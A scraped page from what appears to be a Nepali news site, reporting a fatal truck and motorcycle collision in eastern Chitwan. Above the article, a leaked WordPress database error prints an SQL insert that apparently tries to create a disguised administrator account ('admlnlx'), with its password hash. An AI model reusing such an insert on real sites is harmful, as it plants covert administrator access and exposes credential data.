WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BE.PWd2GI4HmQ4G//.rj7WfOd5Y4bi0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 22:05:17', '', 'admlnlx', 'admlnlx')
चितवन , पुस ५
पूर्वीचितवनको रत्ननगर ३ बेल्सिमा मंगलबार बेलुका भएको सवारी दुर्घटनामा १ जनाको मृत्यु भएको छ । पुर्बबाट पश्चिम् तर्फ जाँदै गरेको ना ४ ख ९१२३ नम्बरको ट्रकमा सोही दिसा तर्फ जाँदै गरेको ना ४२ प ४८५१ नम्बरको मोटरसाइकल ठोकिदा मोटरसाइकल चालकको मृत्यु भएको हो ।
दुर्घटनामा परी गम्भिर घाइते भएका चितवन खैरहनि नगरपालिका १ ज्यामिरे निवासी २७ बर्षीय सांगर सापकोटाको उपचारको क्रममा चितवन मेडिकल कलेजमा मृत्यु भएको इलाका प्रहरी कार्यालय टाडीका प्रमुख प्रहरी नायव उपरिक्षक नारायण रन्जितकारले जानकारीे दिनुभयो । ठक्कर दिने ट्रक र त्यसका चालक इलाका प्रहरी कार्यालय टाडिको नियन्त्रणमा रहेका छन् ।